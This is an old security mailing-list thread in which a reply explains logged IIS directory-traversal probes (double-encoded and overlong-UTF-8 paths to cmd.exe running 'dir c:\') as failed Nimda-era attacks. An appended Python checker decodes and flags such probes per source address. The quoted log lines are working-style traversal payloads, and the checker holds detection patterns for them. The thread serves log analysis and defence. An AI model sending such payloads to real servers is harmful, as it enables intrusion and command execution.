
| Subject: | RE: IIS http error log entries... |
|---|---|
| Date: | Tue, 12 Dec 2006 22:17:00 -0700 |
As most of the people have responded thus far, this is not a cause for concern directly based on these log entries. Essentially what is happening here is that an external user is using a series of character strings against relatively old attack vectors that offered methods of executing commands against the native shell in Windows in long-past versions of IIS. From what we are seeing here, these are old executions trying to exploit weaknesses in FrontPage extensions, RPC-based application pools, as well as the msadc folder in IIS 5.0. Most of these vulnerabilities have been removed over the last several years and the newest attack vector out of those probed below is 3 or so years old (think IIS 5 timeframe).

Speaking specifically to this log snippet, it looks like these were all error-handled correctly and I would advise scanning your access logs as well for any other access attempts from this source IP. As one of the earlier posters to this thread advised, taking the time to assess your IT policy would be a good idea, particularly when it comes to considering policies on log auditing and possibly using some budget to hire or internally execute a penetration test against your servers.

--------------------------------------
Wayne S. Anderson
"A sufficiently developed bug is indistinguishable from a feature."
http://www.linkedin.com/in/wayneanderson

-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com] On Behalf Of nemanja.janic@centroproizvod.co.yu
Sent: Tuesday, December 12, 2006 8:02 AM
To: focus-ms@securityfocus.com
Subject: IIS http error log entries...
Hello list, I hope I got the right group. I just found these in my IIS logs:

```text
2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:41 87.17.7.5 4751 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:41:44 87.17.7.5 1595 192.168.x.x 80 HTTP/1.0 HEAD /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
```

I don't have much experience with this kind of thing, and from digging the net I found that this was used in Nimda attacks a few years ago... any idea what's going on? Should I be worried?
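Added example (my own code, not from the thread or from either poster): a small Python checker that parses HTTP.sys error-log lines of the kind quoted above, decodes each URI the way the old IIS path canonicaliser effectively did (repeated percent-decoding so `%%35c` and `%255c` become `\`, plus the lenient fold of the never-valid `%c0`/`%c1` two-byte sequences), and tags traversal and `cmd.exe` probes per client address so the same source can be followed into the access logs as Wayne recommends. It assumes the standard HTTPERR field order (date, time, client IP and port, server IP and port, version, method, URI, status, site id, reason, queue); the sample lines are constructed and use RFC 5737 documentation addresses rather than the real source IP from the post.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumed field order of the HTTP.sys error log (HTTPERR) lines quoted in the thread.
FIELDS = ["date", "time", "c_ip", "c_port", "s_ip", "s_port", "version",
          "method", "uri", "status", "siteid", "reason", "queue"]

# Constructed sample modelled on the thread's entries; client IPs are
# documentation addresses, not the real source from the post.
SAMPLE_LOG = r"""
2006-12-08 11:38:18 198.51.100.7 2842 192.168.0.10 80 HTTP/1.0 HEAD /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:29 198.51.100.7 2929 192.168.0.10 80 HTTP/1.0 HEAD /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:39:46 198.51.100.7 2435 192.168.0.10 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:41:24 198.51.100.7 4715 192.168.0.10 80 HTTP/1.0 HEAD /msadc/..%255c../..%255c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:42:00 203.0.113.9 1200 192.168.0.10 80 HTTP/1.1 GET /index.htm 400 - BadRequest -
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")
SHELL = re.compile(r"system32[\\/]cmd\.exe", re.IGNORECASE)


def parse_line(line):
    """Split one whitespace-delimited HTTPERR line into a dict, or None if malformed."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def lenient_decode(uri, rounds=3):
    """Percent-decode repeatedly (so %255c and %%35c reach '\\'), then fold the
    two-byte overlong forms %c0%af / %c1%9c / %c1%1c, which are never valid UTF-8,
    with the lenient rule ((b1 & 0x1F) << 6) | (b2 & 0x3F) that yields '/' or '\\'."""
    raw = uri.encode("latin-1", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")


def classify(entry):
    """Return the tags that apply to one parsed entry (empty list = nothing notable)."""
    tags = []
    uri = entry["uri"]
    if uri == "-":
        # No request line was logged; keep the kernel-side reason (e.g. a timer).
        if entry["reason"] != "-":
            tags.append("httpsys:" + entry["reason"])
        return tags
    decoded = lenient_decode(uri)
    single_pass = unquote_to_bytes(uri).decode("latin-1")
    if TRAVERSAL.search(decoded):
        tags.append("traversal")
    if SHELL.search(decoded):
        tags.append("cmd.exe")
    if decoded != single_pass:
        tags.append("double-encoded")  # needed more than one decode, or overlong bytes
    return tags


def scan(log_text):
    """Parse every line and return (entry, tags) pairs for lines that carry a tag."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            findings.append((entry, tags))
    return findings


def summarize(findings):
    """Group findings by client IP for follow-up in the access logs."""
    per_ip = {}
    for entry, tags in findings:
        rec = per_ip.setdefault(entry["c_ip"], {"probes": 0, "tags": set()})
        if "traversal" in tags:
            rec["probes"] += 1
        rec["tags"].update(tags)
    return per_ip


if __name__ == "__main__":
    for ip, rec in summarize(scan(SAMPLE_LOG)).items():
        print(ip, rec["probes"], "traversal probes;", ", ".join(sorted(rec["tags"])))
```

Every probe in the sample, like those in the post, was rejected with a 400 by HTTP.sys before reaching IIS, so the checker's value is attribution and follow-up rather than detecting a live compromise: it yields one source address with three traversal probes and the `Timer_MinBytesPerSecond` entries from the same client, while the ordinary bad request from the other address is left untagged.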